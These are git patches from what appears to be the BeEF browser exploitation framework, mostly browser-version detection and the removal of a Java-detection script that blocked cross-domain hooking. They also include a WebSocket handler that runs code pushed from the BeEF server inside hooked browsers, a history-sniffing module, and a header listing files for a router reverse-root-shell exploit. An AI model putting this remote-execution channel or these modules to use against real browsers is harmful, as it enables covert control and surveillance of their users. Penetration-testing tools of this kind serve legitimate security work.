@@ -321,7 +405,7 @@ function start_stuff() {
 	  maybe_test_next();
   }
   else {
-  	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=This proof-of-concept is specific to Firefox and Internet Explorer, and probably won\'t work for you.');
+  	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=This proof-of-concept is specific to Firefox, Internet Explorer, Chrome and Opera, and probably won\'t work for you.');
   }  
 }
 

From 4e7b983bd33f8fe7dc534e28d2288911f5b4d56d Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Sun, 3 Mar 2013 11:24:08 +0000
Subject: [PATCH 225/397] Added support for Chrome 25.

---
 core/main/client/browser.js | 16 ++++++++++++++--
 1 file changed, 14 insertions(+), 2 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 0ab8b9145..b997300f2 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -428,12 +428,20 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 24) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome 25.
+     * @example: beef.browser.isC25()
+     */
+    isC25:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 25) ? true : false);
+    },
+
     /**
      * Returns true if Chrome.
      * @example: beef.browser.isC()
      */
     isC:function () {
-        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22() || this.isC23() || this.isC24();
+        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22() || this.isC23() || this.isC24() || this.isC25();
     },
 
     /**
@@ -513,6 +521,7 @@ beef.browser = {
             C22:this.isC22(), // Chrome 22
             C23:this.isC23(), // Chrome 23
             C24:this.isC24(), // Chrome 24
+            C25:this.isC25(), // Chrome 25
             C:this.isC(), // Chrome any version
 
             FF2:this.isFF2(), // Firefox 2
@@ -646,7 +655,10 @@ beef.browser = {
             return '24'
         }
         ;    // Chrome 24
-
+        if (this.isC25()) {
+            return '25'
+        }
+        ;
         if (this.isFF2()) {
             return '2'
         }

From b4d690a5f3aa01f8bc62ca2f58bcecce0a188cf3 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Sun, 3 Mar 2013 11:26:00 +0000
Subject: [PATCH 226/397] det_visited_domains now supports also Opera.

---
 modules/browser/get_visited_domains/config.yaml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/modules/browser/get_visited_domains/config.yaml b/modules/browser/get_visited_domains/config.yaml
index 97879eefe..f253fef1d 100644
--- a/modules/browser/get_visited_domains/config.yaml
+++ b/modules/browser/get_visited_domains/config.yaml
@@ -9,8 +9,8 @@ beef:
             enable: true
             category: "Browser"
             name: "Get Visited Domains"
-            description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done at http://lcamtuf.coredump.cx/cachetime/"
-            authors: ["keith_lee @keith55 http://milo2012.wordpress.com"]
+            description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done by Michal Zalewski at http://lcamtuf.coredump.cx/cachetime/"
+            authors: ["@keith55", "quentin"]
             target:
-                working: ["FF", "IE"]
-                not_working: ["O", "C", "S"]
+                working: ["FF", "IE", "O"]
+                not_working: ["C", "S"]

From 6a968e77c0d54aa9ab7d79e8ce1cbc10f8b2e0e7 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Mon, 4 Mar 2013 22:07:47 +0000
Subject: [PATCH 227/397] Removed all the crappy Oracle code to detect if java
 is enabled. Was preventing x-domain hooking on FF.

---
 core/main/client/browser.js | 790 +-----------------------------------
 1 file changed, 1 insertion(+), 789 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index c493b185d..3c064a593 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -993,795 +993,7 @@ beef.browser = {
      * @example: if(beef.browser.javaEnabled()) { ... }
      */
     javaEnabled:function () {
-
-        if (!this.isIE()) {
-
-            // Cross-browser Java Deployment Toolkit Script
-            // Source: http://java.com/js/deployJava.js
-            deployJava = function () {
-                var l = {core:["id", "class", "title", "style"], i18n:["lang", "dir"], events:["onclick", "ondblclick", "onmousedown", "onmouseup", "onmouseover", "onmousemove", "onmouseout", "onkeypress", "onkeydown", "onkeyup"], applet:["codebase", "code", "name", "archive", "object", "width", "height", "alt", "align", "hspace", "vspace"], object:["classid", "codebase", "codetype", "data", "type", "archive", "declare", "standby", "height", "width", "usemap", "name", "tabindex", "align", "border", "hspace", "vspace"]};
-                var b = l.object.concat(l.core, l.i18n, l.events);
-                var m = l.applet.concat(l.core);
-
-                function g(n) {
-                    if (!d.debug) {
-                        return
-                    }
-                    if (console.log) {
-                        console.log(n)
-                    } else {
-                        alert(n)
-                    }
-                }
-
-                function k(o, n) {
-                    if (o == null || o.length == 0) {
-                        return true
-                    }
-                    var q = o.charAt(o.length - 1);
-                    if (q != "+" && q != "*" && (o.indexOf("_") != -1 && q != "_")) {
-                        o = o + "*";
-                        q = "*"
-                    }
-                    o = o.substring(0, o.length - 1);
-                    if (o.length > 0) {
-                        var p = o.charAt(o.length - 1);
-                        if (p == "." || p == "_") {
-                            o = o.substring(0, o.length - 1)
-                        }
-                    }
-                    if (q == "*") {
-                        return(n.indexOf(o) == 0)
-                    } else {
-                        if (q == "+") {
-                            return o <= n
-                        }
-                    }
-                    return false
-                }
-
-                function e() {
-                    var n = "//java.com/js/webstart.png";
-                    try {
-                        return document.location.protocol.indexOf("http") != -1 ? n : "http:" + n
-                    } catch (o) {
-                        return"http:" + n
-                    }
-                }
-
-                function j(p, o) {
-                    var n = p.length;
-                    for (var q = 0; q < n; q++) {
-                        if (p[q] === o) {
-                            return true
-                        }
-                    }
-                    return false
-                }
-
-                function c(n) {
-                    return j(m, n.toLowerCase())
-                }
-
-                function i(n) {
-                    return j(b, n.toLowerCase())
-                }
-
-                function a(n) {
-                    if ("MSIE" != deployJava.browserName) {
-                        return true
-                    }
-                    if (deployJava.compareVersionToPattern(deployJava.getPlugin().version, ["10", "0", "0"], false, true)) {
-                        return true
-                    }
-                    if (n == null) {
-                        return false
-                    }
-                    return !k("1.6.0_33+", n)
-                }
-
-                var d = {debug:null, version:"20120801", firefoxJavaVersion:null, myInterval:null, preInstallJREList:null, returnPage:null, brand:null, locale:null, installType:null, EAInstallEnabled:false, EarlyAccessURL:null, getJavaURL:"http://jdl.sun.com/webapps/getjava/BrowserRedirect?host=java.com", oldMimeType:"application/npruntime-scriptable-plugin;DeploymentToolkit", mimeType:"application/java-deployment-toolkit", launchButtonPNG:e(), browserName:null, browserName2:null, getJREs:function () {
-                    var r = new Array();
-                    if (this.isPluginInstalled()) {
-                        var q = this.getPlugin();
-                        var n = q.jvms;
-                        for (var p = 0; p < n.getLength(); p++) {
-                            r[p] = n.get(p).version
-                        }
-                    } else {
-                        var o = this.getBrowser();
-                        if (o == "MSIE") {
-                            if (this.testUsingActiveX("1.7.0")) {
-                                r[0] = "1.7.0"
-                            } else {
-                                if (this.testUsingActiveX("1.6.0")) {
-                                    r[0] = "1.6.0"
-                                } else {
-                                    if (this.testUsingActiveX("1.5.0")) {
-                                        r[0] = "1.5.0"
-                                    } else {
-                                        if (this.testUsingActiveX("1.4.2")) {
-                                            r[0] = "1.4.2"
-                                        } else {
-                                            if (this.testForMSVM()) {
-                                                r[0] = "1.1"
-                                            }
-                                        }
-                                    }
-                                }
-                            }
-                        } else {
-                            if (o == "Netscape Family") {
-                                this.getJPIVersionUsingMimeType();
-                                if (this.firefoxJavaVersion != null) {
-                                    r[0] = this.firefoxJavaVersion
-                                } else {
-                                    if (this.testUsingMimeTypes("1.7")) {
-                                        r[0] = "1.7.0"
-                                    } else {
-                                        if (this.testUsingMimeTypes("1.6")) {
-                                            r[0] = "1.6.0"
-                                        } else {
-                                            if (this.testUsingMimeTypes("1.5")) {
-                                                r[0] = "1.5.0"
-                                            } else {
-                                                if (this.testUsingMimeTypes("1.4.2")) {
-                                                    r[0] = "1.4.2"
-                                                } else {
-                                                    if (this.browserName2 == "Safari") {
-                                                        if (this.testUsingPluginsArray("1.7.0")) {
-                                                            r[0] = "1.7.0"
-                                                        } else {
-                                                            if (this.testUsingPluginsArray("1.6")) {
-                                                                r[0] = "1.6.0"
-                                                            } else {
-                                                                if (this.testUsingPluginsArray("1.5")) {
-                                                                    r[0] = "1.5.0"
-                                                                } else {
-                                                                    if (this.testUsingPluginsArray("1.4.2")) {
-                                                                        r[0] = "1.4.2"
-                                                                    }
-                                                                }
-                                                            }
-                                                        }
-                                                    }
-                                                }
-                                            }
-                                        }
-                                    }
-                                }
-                            }
-                        }
-                    }
-                    if (this.debug) {
-                        for (var p = 0; p < r.length; ++p) {
-                            g("[getJREs()] We claim to have detected Java SE " + r[p])
-                        }
-                    }
-                    return r
-                }, installJRE:function (q, o) {
-                    var n = false;
-                    if (this.isPluginInstalled() && this.isAutoInstallEnabled(q)) {
-                        var p = false;
-                        if (this.isCallbackSupported()) {
-                            p = this.getPlugin().installJRE(q, o)
-                        } else {
-                            p = this.getPlugin().installJRE(q)
-                        }
-                        if (p) {
-                            this.refresh();
-                            if (this.returnPage != null) {
-                                document.location = this.returnPage
-                            }
-                        }
-                        return p
-                    } else {
-                        return this.installLatestJRE()
-                    }
-                }, isAutoInstallEnabled:function (n) {
-                    if (!this.isPluginInstalled()) {
-                        return false
-                    }
-                    if (typeof n == "undefined") {
-                        n = null
-                    }
-                    return a(n)
-                }, isCallbackSupported:function () {
-                    return this.isPluginInstalled() && this.compareVersionToPattern(this.getPlugin().version, ["10", "2", "0"], false, true)
-                }, installLatestJRE:function (p) {
-                    if (this.isPluginInstalled() && this.isAutoInstallEnabled()) {
-                        var q = false;
-                        if (this.isCallbackSupported()) {
-                            q = this.getPlugin().installLatestJRE(p)
-                        } else {
-                            q = this.getPlugin().installLatestJRE()
-                        }
-                        if (q) {
-                            this.refresh();
-                            if (this.returnPage != null) {
-                                document.location = this.returnPage
-                            }
-                        }
-                        return q
-                    } else {
-                        var o = this.getBrowser();
-                        var n = navigator.platform.toLowerCase();
-                        if ((this.EAInstallEnabled == "true") && (n.indexOf("win") != -1) && (this.EarlyAccessURL != null)) {
-                            this.preInstallJREList = this.getJREs();
-                            if (this.returnPage != null) {
-                                this.myInterval = setInterval("deployJava.poll()", 3000)
-                            }
-                            location.href = this.EarlyAccessURL;
-                            return false
-                        } else {
-                            if (o == "MSIE") {
-                                return this.IEInstall()
-                            } else {
-                                if ((o == "Netscape Family") && (n.indexOf("win32") != -1)) {
-                                    return this.FFInstall()
-                                } else {
-                                    location.href = this.getJavaURL + ((this.returnPage != null) ? ("&returnPage=" + this.returnPage) : "") + ((this.locale != null) ? ("&locale=" + this.locale) : "") + ((this.brand != null) ? ("&brand=" + this.brand) : "")
-                                }
-                            }
-                            return false
-                        }
-                    }
-                }, runApplet:function (o, t, q) {
-                    if (q == "undefined" || q == null) {
-                        q = "1.1"
-                    }
-                    var r = "^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";
-                    var n = q.match(r);
-                    if (this.returnPage == null) {
-                        this.returnPage = document.location
-                    }
-                    if (n != null) {
-                        var p = this.getBrowser();
-                        if (p != "?") {
-                            if (this.versionCheck(q + "+")) {
-                                this.writeAppletTag(o, t)
-                            } else {
-                                if (this.installJRE(q + "+")) {
-                                    this.refresh();
-                                    location.href = document.location;
-                                    this.writeAppletTag(o, t)
-                                }
-                            }
-                        } else {
-                            this.writeAppletTag(o, t)
-                        }
-                    } else {
-                        g("[runApplet()] Invalid minimumVersion argument to runApplet():" + q)
-                    }
-                }, writeAppletTag:function (q, v) {
-                    var n = "<applet ";
-                    var p = "";
-                    var r = "</applet>";
-                    var w = true;
-                    if (null == v || typeof v != "object") {
-                        v = new Object()
-                    }
-                    for (var o in q) {
-                        if (!c(o)) {
-                            v[o] = q[o]
-                        } else {
-                            n += (" " + o + '="' + q[o] + '"');
-                            if (o == "code") {
-                                w = false
-                            }
-                        }
-                    }
-                    var u = false;
-                    for (var t in v) {
-                        if (t == "codebase_lookup") {
-                            u = true
-                        }
-                        if (t == "object" || t == "java_object" || t == "java_code") {
-                            w = false
-                        }
-                        p += '<param name="' + t + '" value="' + v[t] + '"/>'
-                    }
-                    if (!u) {
-                        p += '<param name="codebase_lookup" value="false"/>'
-                    }
-                    if (w) {
-                        n += (' code="dummy"')
-                    }
-                    n += ">";
-                    document.write(n + "\n" + p + "\n" + r)
-                }, versionCheck:function (o) {
-                    var u = 0;
-                    var w = "^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?(\\*|\\+)?$";
-                    var x = o.match(w);
-                    if (x != null) {
-                        var q = false;
-                        var t = false;
-                        var p = new Array();
-                        for (var r = 1; r < x.length; ++r) {
-                            if ((typeof x[r] == "string") && (x[r] != "")) {
-                                p[u] = x[r];
-                                u++
-                            }
-                        }
-                        if (p[p.length - 1] == "+") {
-                            t = true;
-                            q = false;
-                            p.length--
-                        } else {
-                            if (p[p.length - 1] == "*") {
-                                t = false;
-                                q = true;
-                                p.length--
-                            } else {
-                                if (p.length < 4) {
-                                    t = false;
-                                    q = true
-                                }
-                            }
-                        }
-                        var v = this.getJREs();
-                        for (var r = 0; r < v.length; ++r) {
-                            if (this.compareVersionToPattern(v[r], p, q, t)) {
-                                return true
-                            }
-                        }
-                        return false
-                    } else {
-                        var n = "Invalid versionPattern passed to versionCheck: " + o;
-                        g("[versionCheck()] " + n);
-                        alert(n);
-                        return false
-                    }
-                }, isWebStartInstalled:function (q) {
-                    var p = this.getBrowser();
-                    if (p == "?") {
-                        return true
-                    }
-                    if (q == "undefined" || q == null) {
-                        q = "1.4.2"
-                    }
-                    var o = false;
-                    var r = "^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";
-                    var n = q.match(r);
-                    if (n != null) {
-                        o = this.versionCheck(q + "+")
-                    } else {
-                        g("[isWebStartInstaller()] Invalid minimumVersion argument to isWebStartInstalled(): " + q);
-                        o = this.versionCheck("1.4.2+")
-                    }
-                    return o
-                }, getJPIVersionUsingMimeType:function () {
-                    for (var o = 0; o < navigator.mimeTypes.length; ++o) {
-                        var p = navigator.mimeTypes[o].type;
-                        var n = p.match(/^application\/x-java-applet;jpi-version=(.*)$/);
-                        if (n != null) {
-                            this.firefoxJavaVersion = n[1];
-                            if ("Opera" != this.browserName2) {
-                                break
-                            }
-                        }
-                    }
-                }, launchWebStartApplication:function (q) {
-                    var n = navigator.userAgent.toLowerCase();
-                    this.getJPIVersionUsingMimeType();
-                    if (this.isWebStartInstalled("1.7.0") == false) {
-                        if ((this.installJRE("1.7.0+") == false) || ((this.isWebStartInstalled("1.7.0") == false))) {
-                            return false
-                        }
-                    }
-                    var t = null;
-                    if (document.documentURI) {
-                        t = document.documentURI
-                    }
-                    if (t == null) {
-                        t = document.URL
-                    }
-                    var o = this.getBrowser();
-                    var p;
-                    if (o == "MSIE") {
-                        p = '<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0"><PARAM name="launchjnlp" value="' + q + '"><PARAM name="docbase" value="' + t + '"></object>'
-                    } else {
-                        if (o == "Netscape Family") {
-                            p = '<embed type="application/x-java-applet;jpi-version=' + this.firefoxJavaVersion + '" width="0" height="0" launchjnlp="' + q + '"docbase="' + t + '" />'
-                        }
-                    }
-                    if (document.body == "undefined" || document.body == null) {
-                        document.write(p);
-                        document.location = t
-                    } else {
-                        var r = document.createElement("div");
-                        r.id = "div1";
-                        r.style.position = "relative";
-                        r.style.left = "-10000px";
-                        r.style.margin = "0px auto";
-                        r.className = "dynamicDiv";
-                        r.innerHTML = p;
-                        document.body.appendChild(r)
-                    }
-                }, createWebStartLaunchButtonEx:function (p, o) {
-                    if (this.returnPage == null) {
-                        this.returnPage = p
-                    }
-                    var n = "javascript:deployJava.launchWebStartApplication('" + p + "');";
-                    document.write('<a href="' + n + '" onMouseOver="window.status=\'\'; return true;"><img src="' + this.launchButtonPNG + '" border="0" /></a>')
-                }, createWebStartLaunchButton:function (p, o) {
-                    if (this.returnPage == null) {
-                        this.returnPage = p
-                    }
-                    var n = "javascript:if (!deployJava.isWebStartInstalled(&quot;" + o + "&quot;)) {if (deployJava.installLatestJRE()) {if (deployJava.launch(&quot;" + p + "&quot;)) {}}} else {if (deployJava.launch(&quot;" + p + "&quot;)) {}}";
-                    document.write('<a href="' + n + '" onMouseOver="window.status=\'\'; return true;"><img src="' + this.launchButtonPNG + '" border="0" /></a>')
-                }, launch:function (n) {
-                    document.location = n;
-                    return true
-                }, isPluginInstalled:function () {
-                    var n = this.getPlugin();
-                    if (n && n.jvms) {
-                        return true
-                    } else {
-                        return false
-                    }
-                }, isAutoUpdateEnabled:function () {
-                    if (this.isPluginInstalled()) {
-                        return this.getPlugin().isAutoUpdateEnabled()
-                    }
-                    return false
-                }, setAutoUpdateEnabled:function () {
-                    if (this.isPluginInstalled()) {
-                        return this.getPlugin().setAutoUpdateEnabled()
-                    }
-                    return false
-                }, setInstallerType:function (n) {
-                    this.installType = n;
-                    if (this.isPluginInstalled()) {
-                        return this.getPlugin().setInstallerType(n)
-                    }
-                    return false
-                }, setAdditionalPackages:function (n) {
-                    if (this.isPluginInstalled()) {
-                        return this.getPlugin().setAdditionalPackages(n)
-                    }
-                    return false
-                }, setEarlyAccess:function (n) {
-                    this.EAInstallEnabled = n
-                }, isPlugin2:function () {
-                    if (this.isPluginInstalled()) {
-                        if (this.versionCheck("1.6.0_10+")) {
-                            try {
-                                return this.getPlugin().isPlugin2()
-                            } catch (n) {
-                            }
-                        }
-                    }
-                    return false
-                }, allowPlugin:function () {
-                    this.getBrowser();
-                    var n = ("Safari" != this.browserName2 && "Opera" != this.browserName2);
-                    return n
-                }, getPlugin:function () {
-                    this.refresh();
-                    var n = null;
-                    if (this.allowPlugin()) {
-                        n = document.getElementById("deployJavaPlugin")
-                    }
-                    return n
-                }, compareVersionToPattern:function (u, o, q, r) {
-                    if (u == undefined || o == undefined) {
-                        return false
-                    }
-                    var v = "^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";
-                    var w = u.match(v);
-                    if (w != null) {
-                        var t = 0;
-                        var x = new Array();
-                        for (var p = 1; p < w.length; ++p) {
-                            if ((typeof w[p] == "string") && (w[p] != "")) {
-                                x[t] = w[p];
-                                t++
-                            }
-                        }
-                        var n = Math.min(x.length, o.length);
-                        if (r) {
-                            for (var p = 0; p < n; ++p) {
-                                if (x[p] < o[p]) {
-                                    return false
-                                } else {
-                                    if (x[p] > o[p]) {
-                                        return true
-                                    }
-                                }
-                            }
-                            return true
-                        } else {
-                            for (var p = 0; p < n; ++p) {
-                                if (x[p] != o[p]) {
-                                    return false
-                                }
-                            }
-                            if (q) {
-                                return true
-                            } else {
-                                return(x.length == o.length)
-                            }
-                        }
-                    } else {
-                        return false
-                    }
-                }, getBrowser:function () {
-                    if (this.browserName == null) {
-                        var n = navigator.userAgent.toLowerCase();
-                        g("[getBrowser()] navigator.userAgent.toLowerCase() -> " + n);
-                        if ((n.indexOf("msie") != -1) && (n.indexOf("opera") == -1)) {
-                            this.browserName = "MSIE";
-                            this.browserName2 = "MSIE"
-                        } else {
-                            if (n.indexOf("iphone") != -1) {
-                                this.browserName = "Netscape Family";
-                                this.browserName2 = "iPhone"
-                            } else {
-                                if ((n.indexOf("firefox") != -1) && (n.indexOf("opera") == -1)) {
-                                    this.browserName = "Netscape Family";
-                                    this.browserName2 = "Firefox"
-                                } else {
-                                    if (n.indexOf("chrome") != -1) {
-                                        this.browserName = "Netscape Family";
-                                        this.browserName2 = "Chrome"
-                                    } else {
-                                        if (n.indexOf("safari") != -1) {
-                                            this.browserName = "Netscape Family";
-                                            this.browserName2 = "Safari"
-                                        } else {
-                                            if ((n.indexOf("mozilla") != -1) && (n.indexOf("opera") == -1)) {
-                                                this.browserName = "Netscape Family";
-                                                this.browserName2 = "Other"
-                                            } else {
-                                                if (n.indexOf("opera") != -1) {
-                                                    this.browserName = "Netscape Family";
-                                                    this.browserName2 = "Opera"
-                                                } else {
-                                                    this.browserName = "?";
-                                                    this.browserName2 = "unknown"
-                                                }
-                                            }
-                                        }
-                                    }
-                                }
-                            }
-                        }
-                        g("[getBrowser()] Detected browser name:" + this.browserName + ", " + this.browserName2)
-                    }
-                    return this.browserName
-                }, testUsingActiveX:function (n) {
-                    var p = "JavaWebStart.isInstalled." + n + ".0";
-                    if (typeof ActiveXObject == "undefined" || !ActiveXObject) {
-                        g("[testUsingActiveX()] Browser claims to be IE, but no ActiveXObject object?");
-                        return false
-                    }
-                    try {
-                        return(new ActiveXObject(p) != null)
-                    } catch (o) {
-                        return false
-                    }
-                }, testForMSVM:function () {
-                    var o = "{08B0E5C0-4FCB-11CF-AAA5-00401C608500}";
-                    if (typeof oClientCaps != "undefined") {
-                        var n = oClientCaps.getComponentVersion(o, "ComponentID");
-                        if ((n == "") || (n == "5,0,5000,0")) {
-                            return false
-                        } else {
-                            return true
-                        }
-                    } else {
-                        return false
-                    }
-                }, testUsingMimeTypes:function (o) {
-                    if (!navigator.mimeTypes) {
-                        g("[testUsingMimeTypes()] Browser claims to be Netscape family, but no mimeTypes[] array?");
-                        return false
-                    }
-                    for (var p = 0; p < navigator.mimeTypes.length; ++p) {
-                        s = navigator.mimeTypes[p].type;
-                        var n = s.match(/^application\/x-java-applet\x3Bversion=(1\.8|1\.7|1\.6|1\.5|1\.4\.2)$/);
-                        if (n != null) {
-                            if (this.compareVersions(n[1], o)) {
-                                return true
-                            }
-                        }
-                    }
-                    return false
-                }, testUsingPluginsArray:function (o) {
-                    if ((!navigator.plugins) || (!navigator.plugins.length)) {
-                        return false
-                    }
-                    var n = navigator.platform.toLowerCase();
-                    for (var p = 0; p < navigator.plugins.length; ++p) {
-                        s = navigator.plugins[p].description;
-                        if (s.search(/^Java Switchable Plug-in (Cocoa)/) != -1) {
-                            if (this.compareVersions("1.5.0", o)) {
-                                return true
-                            }
-                        } else {
-                            if (s.search(/^Java/) != -1) {
-                                if (n.indexOf("win") != -1) {
-                                    if (this.compareVersions("1.5.0", o) || this.compareVersions("1.6.0", o)) {
-                                        return true
-                                    }
-                                }
-                            }
-                        }
-                    }
-                    if (this.compareVersions("1.5.0", o)) {
-                        return true
-                    }
-                    return false
-                }, IEInstall:function () {
-                    location.href = this.getJavaURL + ((this.returnPage != null) ? ("&returnPage=" + this.returnPage) : "") + ((this.locale != null) ? ("&locale=" + this.locale) : "") + ((this.brand != null) ? ("&brand=" + this.brand) : "");
-                    return false
-                }, done:function (o, n) {
-                }, FFInstall:function () {
-                    location.href = this.getJavaURL + ((this.returnPage != null) ? ("&returnPage=" + this.returnPage) : "") + ((this.locale != null) ? ("&locale=" + this.locale) : "") + ((this.brand != null) ? ("&brand=" + this.brand) : "") + ((this.installType != null) ? ("&type=" + this.installType) : "");
-                    return false
-                }, compareVersions:function (q, r) {
-                    var o = q.split(".");
-                    var n = r.split(".");
-                    for (var p = 0; p < o.length; ++p) {
-                        o[p] = Number(o[p])
-                    }
-                    for (var p = 0; p < n.length; ++p) {
-                        n[p] = Number(n[p])
-                    }
-                    if (o.length == 2) {
-                        o[2] = 0
-                    }
-                    if (o[0] > n[0]) {
-                        return true
-                    }
-                    if (o[0] < n[0]) {
-                        return false
-                    }
-                    if (o[1] > n[1]) {
-                        return true
-                    }
-                    if (o[1] < n[1]) {
-                        return false
-                    }
-                    if (o[2] > n[2]) {
-                        return true
-                    }
-                    if (o[2] < n[2]) {
-                        return false
-                    }
-                    return true
-                }, enableAlerts:function () {
-                    this.browserName = null;
-                    this.debug = true
-                }, poll:function () {
-                    this.refresh();
-                    var n = this.getJREs();
-                    if ((this.preInstallJREList.length == 0) && (n.length != 0)) {
-                        clearInterval(this.myInterval);
-                        if (this.returnPage != null) {
-                            location.href = this.returnPage
-                        }
-                    }
-                    if ((this.preInstallJREList.length != 0) && (n.length != 0) && (this.preInstallJREList[0] != n[0])) {
-                        clearInterval(this.myInterval);
-                        if (this.returnPage != null) {
-                            location.href = this.returnPage
-                        }
-                    }
-                }, writePluginTag:function () {
-                    var n = this.getBrowser();
-                    if (n == "MSIE") {
-                        document.write('<object classid="clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA" id="deployJavaPlugin" width="0" height="0"></object>')
-                    } else {
-                        if (n == "Netscape Family" && this.allowPlugin()) {
-                            this.writeEmbedTag()
-                        }
-                    }
-                }, refresh:function () {
-                    navigator.plugins.refresh(false);
-                    var n = this.getBrowser();
-                    if (n == "Netscape Family" && this.allowPlugin()) {
-                        var o = document.getElementById("deployJavaPlugin");
-                        if (o == null) {
-                            this.writeEmbedTag()
-                        }
-                    }
-                }, writeEmbedTag:function () {
-                    var n = false;
-                    if (navigator.mimeTypes != null) {
-                        for (var o = 0; o < navigator.mimeTypes.length; o++) {
-                            if (navigator.mimeTypes[o].type == this.mimeType) {
-                                if (navigator.mimeTypes[o].enabledPlugin) {
-                                    document.write('<embed id="deployJavaPlugin" type="' + this.mimeType + '" hidden="true" />');
-                                    n = true
-                                }
-                            }
-                        }
-                        if (!n) {
-                            for (var o = 0; o < navigator.mimeTypes.length; o++) {
-                                if (navigator.mimeTypes[o].type == this.oldMimeType) {
-                                    if (navigator.mimeTypes[o].enabledPlugin) {
-                                        document.write('<embed id="deployJavaPlugin" type="' + this.oldMimeType + '" hidden="true" />')
-                                    }
-                                }
-                            }
-                        }
-                    }
-                }};
-                d.writePluginTag();
-                if (d.locale == null) {
-                    var h = null;
-                    if (h == null) {
-                        try {
-                            h = navigator.userLanguage
-                        } catch (f) {
-                        }
-                    }
-                    if (h == null) {
-                        try {
-                            h = navigator.systemLanguage
-                        } catch (f) {
-                        }
-                    }
-                    if (h == null) {
-                        try {
-                            h = navigator.language
-                        } catch (f) {
-                        }
-                    }
-                    if (h != null) {
-                        h.replace("-", "_");
-                        d.locale = h
-                    }
-                }
-                return d
-            }();
-
-            var versionJRE = deployJava.getJREs();
-
-            if (versionJRE != '') {
-                return true;
-            } else {
-                return false;
-            }
-        }
-        else {
-            function testUsingActiveX(n) {
-                var p = "JavaWebStart.isInstalled." + n + ".0";
-                if (typeof ActiveXObject == "undefined" || !ActiveXObject) {
-                    g("[testUsingActiveX()] Browser claims to be IE, but no ActiveXObject object?");
-                    return false
-                }
-                try {
-                    return (new ActiveXObject(p) != null)
-                } catch (o) {
-                    return false
-                }
-            }
-
-            if (testUsingActiveX("1.7.0")) {
-                return true;
-            } else {
-                if (testUsingActiveX("1.6.0")) {
-                    return true;
-                } else {
-                    if (testUsingActiveX("1.5.0")) {
-                        return true;
-                    } else {
-                        if (testUsingActiveX("1.4.2")) {
-                            return true;
-                        }
-                        else {
-                            return false;
-                        }
-                    }
-                }
-            }
-
-
-        }
-
+        return false;
     },
 
     /**

From 713a20f1577b6551a2eb382e5c7780310200f0c1 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Tue, 5 Mar 2013 10:37:49 +0000
Subject: [PATCH 228/397] Replaced eval with new Function when executing data
 coming from BeEF's WebSocket server.

---
 core/main/client/websocket.js | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/core/main/client/websocket.js b/core/main/client/websocket.js
index 393226c7d..e45a3bc25 100644
--- a/core/main/client/websocket.js
+++ b/core/main/client/websocket.js
@@ -53,9 +53,10 @@ beef.websocket = {
         };
 
         this.socket.onmessage = function (message) {
-            //todo: double-check if there is a way to don't use eval here. It's not a big deal,
-            //todo: because the eval'ed data comes from BeEF itself, so is implicitly trusted.
-            eval(message.data);
+            // Data coming from the WebSocket channel is either of String, Blob or ArrayBufferdata type.
+            // That's why it needs to be evaluated first. Using Function is a bit better than pure eval().
+            // It's not a big deal anyway, because the eval'ed data comes from BeEF itself, so it is implicitly trusted.
+            new Function(message.data)();
         };
 
         this.socket.onclose = function () {

From de2bd15769c446ce941649178da25ed328afc3a9 Mon Sep 17 00:00:00 2001
From: bmantra <bart.leppens@gmail.com>
Date: Wed, 6 Mar 2013 19:34:27 +0100
Subject: [PATCH 229/397] module for m0n0wall csrf reverse root shell #824

---
 modules/exploits/m0n0wall/COPYING.GPL         | 339 ++++++++++++++++++
 .../m0n0wall/COPYING.PHP-REVERSE-SHELL        |   6 +
 modules/exploits/m0n0wall/command.js          |  34 ++
 modules/exploits/m0n0wall/config.yaml         |  15 +
 modules/exploits/m0n0wall/module.rb           |  28 ++
 .../exploits/m0n0wall/php-reverse-shell.php   | 204 +++++++++++
 6 files changed, 626 insertions(+)
 create mode 100644 modules/exploits/m0n0wall/COPYING.GPL
 create mode 100644 modules/exploits/m0n0wall/COPYING.PHP-REVERSE-SHELL
 create mode 100644 modules/exploits/m0n0wall/command.js
 create mode 100644 modules/exploits/m0n0wall/config.yaml
 create mode 100644 modules/exploits/m0n0wall/module.rb
 create mode 100644 modules/exploits/m0n0wall/php-reverse-shell.php

diff --git a/modules/exploits/m0n0wall/COPYING.GPL b/modules/exploits/m0n0wall/COPYING.GPL
